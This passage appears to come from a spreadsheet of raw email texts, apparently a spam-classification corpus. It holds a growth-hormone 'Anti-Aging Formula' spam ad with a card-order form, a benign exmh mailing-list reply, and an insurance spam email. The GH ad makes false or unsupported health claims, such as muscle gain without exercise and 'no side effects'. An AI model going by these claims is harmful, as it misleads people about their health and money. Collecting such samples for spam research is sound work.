 _ Increased fertility &lt;BR&gt;
 _ Enhanced immune system &lt;BR&gt;
 _ Quicker wound and fracture healing &lt;BR&gt;
 _ New hair growth and color reparation &lt;BR&gt;
 _ Sharper vision &lt;BR&gt;
 _ Improved exercise performance and tolerance &lt;BR&gt;
 _ Increased muscle mass without exercise &lt;BR&gt;
 _ Reduction of cellulite and fat &lt;BR&gt;
 _ Increased stamina and vitality &lt;BR&gt;
 _ Reduction in high blood pressure &lt;BR&gt;
 _ Improvement in sleep &lt;BR&gt;
 _ Anti-aging &lt;BR&gt;
 _ Wrinkle reduction and smoothing &lt;BR&gt;
 _ Decrease in LDL (bad) cholesterol &lt;BR&gt;
 _ Increase in HDL (good) cholesterol &lt;BR&gt;
 _ Strengthening of bones &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; IS GH SAFE?&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#00FF00"&gt;&lt;B&gt; &lt;BR&gt;
 GH has been successfully used in the medical community &lt;BR&gt;
 for over thirty years and has been studies for over 60 years. &lt;BR&gt;
 Edmond Klein, M.D. and L. Cas Terry Ph.D., tested over &lt;BR&gt;
 800 individuals and reported in their 1995 study that &lt;BR&gt;
 GH had substantial benefits and no side effects.&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; **********************************************=
 *************************&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 You're going to receive Anti-Aging Formula for under $150.00... &lt;BR&gt;
 Not even $50.00... You are going to receive the entire &lt;BR&gt;
 life-changing Anti-Aging Formula for only $28.95. &lt;BR&gt;
 This is NOT a misprint. &lt;BR&gt;
 But you had better act fast because supplies are limited. &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 &lt;BR&gt;
 PS I almost forgot. &lt;BR&gt;
 "Anti-Aging Formula" comes with a ONE MONTH FULL REFUND GUARANTEE! &lt;BR&gt;
 So your one-time fee is refundable making your decision risk free! &lt;BR&gt;
 WE GUARANTEE THAT IF YOU ARE NOT COMPLETELY SATISFIED, &lt;BR&gt;
 JUST RETURN THE UN-USED PORTION WITHIN 30 DAYS AND &lt;BR&gt;
 WE WILL GIVE YOU A FULL REFUND OF THE PURCHASE PRICE. &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#00FF00"&gt;&lt;B&gt; *** Our normal price for Anti-Aging Formula is=
  28.95 dollars.&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; For a limited time only, you can purchase a 3 =
 MONTH SUPPLY for only $48.95! &lt;BR&gt;
 That is a savings of $37.90 off our regular price. &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#00FF00"&gt;&lt;B&gt; We will also continue to offer you the Anti-Ag=
 ing Formula at this low price as long as you purchase from us in the futur=
 e. To take advantage of this savings you must order within the next 10 day=
 s.&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face=3D"Times New Roman"&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 *********************************************************************** &lt;B=
 R&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; ORDER TODAY: (CREDIT CARD, CASH, CHECK, OR MON=
 EY ORDER)&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; SEND Only $28.95(Each bottle is a months suppl=
 y.) &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 For Shipping OUTSIDE the US please add $11.00&lt;BR&gt;
 &lt;BR&gt;
 or &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; 3 MONTHS SUPPLY for only $48.95! &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 For Shipping OUTSIDE the US please add $11.00. &lt;BR&gt;
 &lt;BR&gt;
 Shipping is included! &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; To place your order merely fill out the follow=
 ing form and fax to 1-7.7.5-6.6.7-9.2.1.6. &lt;BR&gt;
 If this line is busy, please try faxing to 1-4.1.3-3.7.5-0.1.0.9.&lt;BR&gt;
  &lt;BR&gt;
 Internet Information Services &lt;BR&gt;
 PO Box 21442 &lt;BR&gt;
 Billings, MT 59104 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 (ALL ORDERS FILLED WITHIN 24 HOURS OF RECEIVING THEM)&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 Please allow 7 days for delivery. &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; &lt;BR&gt;
 ************************* &lt;BR&gt;
 Card Order Form &lt;BR&gt;
 &lt;BR&gt;
 Name on Card: &lt;BR&gt;
 &lt;BR&gt;
 Address: &lt;BR&gt;
 &lt;BR&gt;
 City/State/ZIP: &lt;BR&gt;
 &lt;BR&gt;
 Your email address: &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; ++++++++++++++++++++++++++++++++++++++++&lt;/B&gt;&lt;/=
 FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 Please circle one &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; Please send me a ONE month supply for $28.95 &lt;=
 /B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 For Shipping OUTSIDE the US please add $11.00 &lt;BR&gt;
 &lt;BR&gt;
 OR &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; Please send me a THREE month supply for $48.95=
  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; For Shipping OUTSIDE the US please add $11.00 =
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; This is a savings of $37.90 off our regular pr=
 ice. &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; ++++++++++++++++++++++++++++++++++++++++&lt;/B&gt;&lt;/=
 FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 Card Number: &lt;BR&gt;
 &lt;BR&gt;
 Date Card Expires: &lt;BR&gt;
 &lt;BR&gt;
 If you do not receive your order within 10 days, please send us a fax lett=
 ing us know of the late &lt;BR&gt;
 arrival. We will then contact you to figure out why you have not received =
 your order. &lt;BR&gt;
 &lt;BR&gt;
 Please tell us your phone Number: &lt;BR&gt;
 &lt;BR&gt;
 Please tell us your fax Number: &lt;BR&gt;
 To order by Check or Money Order: &lt;BR&gt;
 &lt;BR&gt;
 MAKE YOUR CHECK PAYABLE TO &lt;BR&gt;
 Internet Information Services &lt;BR&gt;
 &lt;BR&gt;
 Name: &lt;BR&gt;
 &lt;BR&gt;
 Address: &lt;BR&gt;
 &lt;BR&gt;
 City/State/ZIP: &lt;BR&gt;
 &lt;BR&gt;
 E-mail Address: &lt;BR&gt;
 &lt;BR&gt;
 If you do not receive your order within 10 days, please send us a fax lett=
 ing us know of the late &lt;BR&gt;
 arrival. We will then contact you to figure out why you have not received =
 your order. &lt;BR&gt;
 &lt;BR&gt;
 Please tell us your phone Number: &lt;BR&gt;
 &lt;BR&gt;
 Please tell us your fax Number: &lt;BR&gt;
 &lt;BR&gt;
 Thank you for your business, &lt;BR&gt;
 &lt;BR&gt;
 Internet Information Services &lt;BR&gt;
 PO Box 21442 &lt;BR&gt;
 Billings, MT 59104 &lt;BR&gt;
 &lt;BR&gt;
 Fax to 1-7.7.5-6.6.7-9.2.1.6. If this line is busy, please try faxing to 1=
 -4.1.3-3.7.5-0.1.0.9. &lt;BR&gt;
 &lt;BR&gt;
 Copyright (c) 1997-2000 &lt;BR&gt;
 All Rights Reserved &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;BR&gt;
 Anti-Aging Formula comes with a ONE MONTH FULL REFUND GUARANTEE! &lt;BR&gt;
 So your one-time fee is refundable making your decision easy! &lt;BR&gt;
 WE GUARANTEE THAT IF YOU ARE NOT COMPLETELY SATISFIED, &lt;BR&gt;
 JUST RETURN THE UN-USED PORTION WITHIN 30 DAYS &lt;BR&gt;
 AND WE WILL GIVE YOU A FULL REFUND OF THE PURCHASE PRICE. &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; ++++++++++++++++++++++++++++++++++++++++++++++=
 +++++++++&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; This ad is produced and sent out by: Universal=
  Advertising Systems &lt;BR&gt;
 To be taken off our list please email us at &lt;BR&gt;
 vanessagreen@freeze.com &lt;BR&gt;
 with take me off in the subject line or call us toll free at &lt;BR&gt;
 1-8.8.8-6.05-2.4.8.5 and give us your email address &lt;BR&gt;
 or write us at:Central Database, PO Box 1200, Oranjestad, Aruba&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; ++++++++++++++++++++++++++++++++++++++++++++++=
 ++++++++++&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt;  &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;P align=3Dcenter&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT color=3D"#C0C0C0"&gt;&lt;B&gt; Content-Transfer-Encoding: 7BIT&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face=3D"Times New Roman"&gt;
 &lt;FONT color=3D"#FFFF00"&gt;&lt;B&gt; &lt;/P&gt;&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FO=
 NT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;=
 /FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FON=
 T&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/=
 FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-2080822444P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 21 Aug 2002 10:40:39 -0500
 &gt;
 &gt; &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500
 &gt; &gt;
 &gt; &gt; &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700
 &gt; &gt; &gt;
 &gt; &gt; &gt; Second, I've been used to having a key binding which was to Msg_MarkUnseen
 &gt; &gt; &gt; which doesn't seem to exist any more, and I'm not sure what I should replace
 &gt; &gt; &gt; that with.   There's obviously a way as the "Sequences" menu does this.
 &gt; &gt; &gt; The "Mark Unseen" menu entry in the message "More" menu is still wanting
 &gt; &gt; &gt; that function as well...
 &gt; 
 &gt; {Msg_Mark unseen}
 &gt; 
 &gt; I'm not sure how I missed the need to fix this in app-defaults for "Mark 
 &gt; Unseen".  I guess that'll be my next CVS fix.
 Okay, that was easy...fixed in CVS.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-2080822444P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y7YUK9b4h5R0IUIRAtwwAKCMaAHTzEMkIm1Lb7voD0y9i36uHQCcD+Ib
 eKMiTiUj35WyS0s1AeCQQFQ=
 =lW45
 -----END PGP SIGNATURE-----
 --==_Exmh_-2080822444P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Feeling Exposed?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_281518_01C205B4.F6FEA190
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
 =20
 =20
  	Feeling
 Exposed?
 We Cover
 Your Assets! =09
 Policies as low as $525
 A+
 Rated
 Carrier
 Additional
 Coverage Endorsements =09
 =B7 Vicarious Liability
 =B7 Financial Products
 =B7 Property &amp; Casualty
 =B7 Investment Services=20
 =20
 As a Life, Accident, Health agent or broker, potential litigation
 against you can arise from numerous sources--a dissatisfied
 policyholder, insurance carrier, or other third party. You need to be
 prepared to defend yourself even against the most unfounded or frivolous
 allegations. After surveying hundreds of agents and brokers, Rockwood
 Programs Inc. has developed one of the most comprehensive errors and
 omissions policies in the industry--the "Rockwood Guardian."=20
 Policy Highlights =09
 ?	 Limit of liability options available up to 1 million. =09
 ?	 $1.5 million of defense protection in addition to the limit of
 liability. Policy deductibles do not apply to defense costs; =09
 ?	 Punitive damage protection (where permissible by law); =09
 ?	 Insolvency of carrier coverage (on carriers rated B+ or higher
 by A.M. Best). =09
 ?	 Extended reporting period provision available (free to
 retirees); =09
 ?	 Low deductible ($2,500); and =09
 ?	 Short Form Application. =09
 Call Corlin Hackett, one of our dedicated underwriting professionals,
 today at 877-242-2487 and click here
 &lt;http://www.insurancemail.net/images/rock/RKGRDMI6.PDF&gt;  for an
 application. We are available to assist you in the enrollment process
 and answer any questions regarding the E&amp;O program.
 =20
 Are you a Life Company President, Sales Manager, Broker-Dealer, or large
 GA? Rockwood offers additional services such as sponsored E&amp;O Programs,
 compliance, and database development.
 Contact: Call or e-mail &lt;mailto:corlin.hackett@rockwoodinsurance.com&gt;
 Corlin Hackett  877-242-2487
 ? or ?=20
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  =09
  	  Life/Health Agent 	 	  Property/Casualty Agent =09
  	  	 	   =09
 =20
 Visit us on the web at www.rockwoodinsurance.com
 &lt;http://www.rockwoodinsurance.com/&gt;=20
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 &lt;http://www.insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_281518_01C205B4.F6FEA190
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;title&gt;Feeling Exposed?&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#3399cc"&gt;
 &lt;table border=3D"1" width=3D"550" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolorlight=3D"#000000" bordercolordark=3D"#000000" =
 bordercolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#FFFFFF" valign=3D"top"&gt;=20
       &lt;table border=3D"0" width=3D"100%" cellspacing=3D"3" =
 cellpadding=3D"3"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" bgcolor=3D"#FFFFFF" valign=3D"top" =
 colspan=3D"2"&gt;=20
             &lt;table border=3D"0" width=3D"100%"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" valign=3D"top" align=3D"center"&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/rock/assetts/baby201.jpg" width=3D"225" =
 height=3D"83"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/rock/assetts/baby202.gif" width=3D"225" =
 height=3D"42"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/rock/assetts/baby203.jpg" width=3D"225" =
 height=3D"85"&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"50%" valign=3D"top"&gt;=20
                   &lt;b&gt;&lt;font size=3D"7" face=3D"Verdana" =
 color=3D"#000066"&gt;Feeling&lt;br&gt;
                   Exposed?&lt;br&gt;
                   &lt;font size=3D"6"&gt;We Cover&lt;br&gt;
                   Your Assets!&lt;/font&gt;&lt;/b&gt;=20
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"32%" bgcolor=3D"#FFFFFF" valign=3D"top"&gt;=20
             &lt;table border=3D"1" width=3D"100%" bordercolor=3D"#000000" =
 cellspacing=3D"0" cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#000066"&gt;=20
                   &lt;table border=3D"0" width=3D"100%" cellspacing=3D"6" =
 cellpadding=3D"6" height=3D"607"&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"100%" height=3D"17" align=3D"center"&gt; =
                         &lt;b&gt;&lt;font size=3D"6" face=3D"Verdana" =
 color=3D"#FFFFFF"&gt;
                         Policies as low as $525&lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;font color=3D"#FFCC00"&gt;A+&lt;/font&gt;&lt;br&gt;
                         Rated&lt;br&gt;
                         Carrier&lt;/font&gt;&lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;br&gt;
                         &lt;font face=3D"Verdana" size=3D"4" =
 color=3D"#FFCC00"&gt;Additional&lt;br&gt;
                         Coverage Endorsements&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"100%"&gt;=20
                         &lt;b&gt;&lt;font face=3D"Arial" size=3D"2" =
 color=3D"#FFFFFF"&gt;=20
                         &lt;font color=3D"#FFCC00"&gt;=B7&lt;/font&gt; Vicarious =
 Liability&lt;br&gt;
                         &lt;font color=3D"#FFCC00"&gt;=B7&lt;/font&gt; Financial =
 Products&lt;br&gt;
                         &lt;font color=3D"#FFCC00"&gt;=B7&lt;/font&gt; Property =
 &amp;amp; Casualty&lt;br&gt;
                         &lt;font color=3D"#FFCC00"&gt;=B7&lt;/font&gt; Investment =
 Services &lt;/font&gt;&lt;/b&gt;
                         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td width=3D"68%" bgcolor=3D"#FFFFFF" valign=3D"top"&gt;=20
             &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;As=20
               a Life, Accident, Health agent or broker, potential =
 litigation against=20
               you can arise from numerous sources--a dissatisfied =
 policyholder,=20
               insurance carrier, or other third party. You need to be =
 prepared=20
               to defend yourself even against the most unfounded or =
 frivolous=20
               allegations. After surveying hundreds of agents and =
 brokers, Rockwood=20
               Programs Inc. has developed one of the most comprehensive =
 errors=20
               and omissions policies in the industry--the =
 &amp;quot;&lt;b&gt;Rockwood Guardian&lt;/b&gt;.&amp;quot;&lt;/font&gt;=20
             &lt;/p&gt;
             &lt;table border=3D"1" width=3D"100%" cellpadding=3D"0" =
 bordercolor=3D"#000000" bordercolorlight=3D"#000000" =
 bordercolordark=3D"#000000" cellspacing=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#000066" align=3D"center"&gt; =
 &lt;b&gt;&lt;font color=3D"#FFCC00" face=3D"Verdana" size=3D"4"&gt;Policy =
 Highlights&lt;/font&gt;&lt;/b&gt; &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#CCCCCC"&gt;=20
                   &lt;table border=3D"0" width=3D"100%" cellpadding=3D"2"&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;font face=3D"Arial" size=3D"2"&gt;&lt;b&gt;Limit of =
 liability options available up to 1 million.&lt;/b&gt;&lt;/font&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;font face=3D"Arial" size=3D"2"&gt;&lt;b&gt;$1.5 million =
 of defense protection=20
                         &lt;i&gt;in addition&lt;/i&gt; to the limit of liability. =
 Policy deductibles=20
                         &lt;i&gt;do not&lt;/i&gt; apply to defense costs;&lt;/b&gt;&lt;/font&gt; =
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;b&gt;&lt;font face=3D"Arial" size=3D"2"&gt;Punitive =
 damage protection (where permissible by law);&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;b&gt;&lt;font face=3D"Arial" size=3D"2"&gt;Insolvency of =
 carrier=20
                         coverage (on carriers rated B+ or higher by A.M. =
 Best).&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;b&gt;&lt;font face=3D"Arial" size=3D"2"&gt;Extended =
 reporting period provision available (free to retirees);&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;b&gt;&lt;font face=3D"Arial" size=3D"2"&gt;Low =
 deductible ($2,500); and&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"10%" align=3D"center" =
 valign=3D"top"&gt;&lt;font color=3D"#000066" size=3D"5"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"90%"&gt;=20
                         &lt;b&gt;&lt;font face=3D"Arial" size=3D"2"&gt;Short Form =
 Application.&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;
             &lt;p&gt;&lt;br&gt;
               Call &lt;b&gt;Corlin Hackett&lt;/b&gt;, one of our dedicated =
 underwriting professionals,=20
               today at &lt;b&gt;877-242-2487&lt;/b&gt; and &lt;a =
 href=3D"http://www.insurancemail.net/images/rock/RKGRDMI6.PDF" =
 style=3D"color: #000099"&gt;&lt;b&gt;click=20
               here&lt;/b&gt;&lt;/a&gt; for an application. We are available to =
 assist you=20
               in the enrollment process and answer any questions =
 regarding the=20
               E&amp;amp;O program.&lt;/p&gt;
             &lt;/font&gt;=20
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" bgcolor=3D"#FFFFFF" valign=3D"top" =
 align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;p&gt;Are you a Life=20
               Company President, Sales Manager, Broker-Dealer, or large =
 GA? Rockwood=20
               offers additional services such as sponsored E&amp;amp;O =
 Programs, compliance,=20
               and database development.&lt;/p&gt;
             &lt;p&gt;&lt;b&gt;Contact:&lt;/b&gt; Call=20
               or &lt;a =
 href=3D"mailto:corlin.hackett@rockwoodinsurance.com"&gt;e-mail&lt;/a&gt;=20
               Corlin Hackett&amp;nbsp; &lt;b&gt;877-242-2487&lt;br&gt;
               &amp;#151; or &amp;#151;&lt;/b&gt;
             &lt;table cellspacing=3D2 cellpadding=3D2 width=3D"95%" =
 align=3Dcenter bgcolor=3D"#000000"&gt;
               &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
